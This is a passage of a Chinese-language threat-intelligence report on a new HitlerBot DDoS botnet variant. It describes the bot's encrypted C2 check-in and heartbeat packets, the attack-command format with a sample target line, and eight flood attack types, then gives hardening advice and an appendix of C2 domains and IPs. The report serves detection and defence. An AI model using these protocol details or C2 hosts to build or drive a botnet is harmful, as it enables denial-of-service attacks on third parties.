style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.7.2 建立通信</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HitlerBot新变种通信流量仍采用与配置表相同的魔改RC4算法加密，加密和解密后流量的对比图如下：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023870" class="rich_pages wxw-img" data-ratio="0.26242774566473986" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=e9ad0b0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySKfkf07xYY9Kk8o4y35eKjP47hE8RmKzfCJdqTUPJguq4K4Cqao0y3g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">解密后流量为：</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023871" class="rich_pages wxw-img" data-ratio="0.15260115606936417" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ed62382d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySv3qWgibqAIV1jfssPAsG45ibnrKmVInbCWcdKzPG3dKUkibKAvJjG3WKw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size:14.0pt;mso-bidi-font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:
ZH-CN;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="">具体通信步骤为：</span></span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">上线包：成功建立TCP连接后，bot会发送上线包，格式为： </span></p><table style="width:548px;"><tbody><tr><td data-colwidth="212"><p><span leaf="">字段</span></p></td><td data-colwidth="336"><p><span leaf="">说明</span></p></td></tr><tr><td data-colwidth="212"><p><span leaf="">32字节前缀</span></p></td><td data-colwidth="336"><p><span leaf="">azbd27sc1ycbgmz1dn2sf02c5tcow2lh</span></p></td></tr><tr><td data-colwidth="212"><p><span leaf="">运行参数</span></p></td><td data-colwidth="336"><p><span leaf="">gay</span></p></td></tr><tr><td data-colwidth="212"><p><span leaf="">用户权限标识</span></p></td><td data-colwidth="336"><p><span leaf="">0：普通用户，1：root用户</span></p></td></tr><tr><td data-colwidth="212"><p><span leaf="">bot公网ip（新增）</span></p></td><td data-colwidth="336"><p><span leaf="">ip尾部可能包含0x00填充字节</span></p></td></tr></tbody></table></li><li><p><span leaf="">响应包：C2以2个字节（如：31 f1，解密后为&gt;&gt;）响应bot上线包；</span></p></li><li><p><span leaf="">心跳包：接着，bot发送2个字节的心跳包（如：33 f3，解密后为&lt;&lt;），而C2也以2字节响应（如：31 f1，解密后为&gt;&gt;）；</span></p></li><li><p><span leaf="">DDoS攻击指令包：C2发送的攻击指令包具有如下格式，各个参数间以空格分隔：</span></p></li></ol><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;">攻击向量 目标ip 持续时间 目的端口 源端口(为0用随机值) 发送数据长度 睡眠时间(新增) 发送数据长度 填充字节码(新增，若为0，则payload用随机字节码填充)</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">形如：0 13.70.103.247 60 30135 0 1 0 (null) 0</span></span></p></td></tr></tbody></table><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HitlerBot新变种支持如下8种DDoS攻击类型：</span></span></p></div></div><table style="width:576px;"><tbody><tr><td data-colwidth="166"><p><span leaf="">指令号</span></p></td><td data-colwidth="204"><p><span leaf="">新变种DDoS类型</span></p></td><td data-colwidth="206"><p><span leaf="">早期变种DDoS类型</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">0</span></p></td><td data-colwidth="204"><p><span leaf="">udp_flood_0</span></p></td><td data-colwidth="206"><p><span leaf="">udp_plain_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">1</span></p></td><td data-colwidth="204"><p><span leaf="">tcp_syn_flood</span></p></td><td data-colwidth="206"><p><span leaf="">tcp_syn_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">2</span></p></td><td data-colwidth="204"><p><span leaf="">tcp_flood_2</span></p></td><td data-colwidth="206"><p><span leaf="">tcp_ack_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">3</span></p></td><td data-colwidth="204"><p><span leaf="">icmp_flood（新增）</span></p></td><td data-colwidth="206"><p><span leaf="">tcp_syn_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">4</span></p></td><td data-colwidth="204"><p><span leaf="">udp_flood_4</span></p></td><td data-colwidth="206"><p><span leaf="">tcp_stomp_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">5</span></p></td><td data-colwidth="204"><p><span leaf="">udp_flood_5</span></p></td><td data-colwidth="206"><p><span leaf="">greip_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">6</span></p></td><td data-colwidth="204"><p><span leaf="">tcp_ack_flood</span></p></td><td data-colwidth="206"><p><span leaf="">greeth_flood</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">7</span></p></td><td data-colwidth="204"><p><span leaf="">udp_flood_7</span></p></td><td data-colwidth="206"><p><span leaf="">无</span></p></td></tr></tbody></table><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 五、防范排查建议 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">HitlerBot新变种通过反虚拟机、反沙箱、mount挂载绑定方式隐藏bot进程等手段不断强化对抗，以及使用魔改加密、复合加密进一步增强其隐蔽性（RapperBot、AISURU僵尸网络亦是如此），这对防御方也提出了更高要求，可以预见未来围绕自定义算法、反虚拟环境的攻防对抗将持续上演，值得大家引起关注。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">广大用户可使用360安全大脑相关产品进行实时拦截与防护，并从以下4个方面进行加固，以免遭受黑客攻击，造成不必要的损失。</span></span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">服务器/IoT设备应配置高强度的登录密码（大小写字母、数字和特殊字符的组合密码，尤其是多个设备不要统一使用同一个密码），并定期更换密码；</span></p></li><li><p><span leaf="">修改ssh端口为其他端口（非22端口）；</span></p></li><li><p><span leaf="">若非业务需要，不要在公网开放业务端口，采用本地或内网访问，设置访问白名单等方式进行加固；</span></p></li><li><p><span leaf="">及时更新主机漏洞补丁，将应用软件升级到安全版本。</span></p></li></ol><div data-role="outer" label="edit by 135editor"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">C2</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">afgansour[.]1</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">daylightbomb[.]elite</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">goofyorg[.]com</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">dd.goofyorg[.]com</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">tubeyou[.]us</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">tls.tubeyou[.]us </span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">20.188.115.250</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">20.238.21.17</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">34.52.174.135</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">34.72.194.50</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">34.95.225.115</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">34.131.107.191</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">35.236.143.181</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">103.188.82.81</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">103.188.82.112</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">134.112.17.99</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">163.227.128.67</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">172.105.23.122</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">172.235.16.235</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino 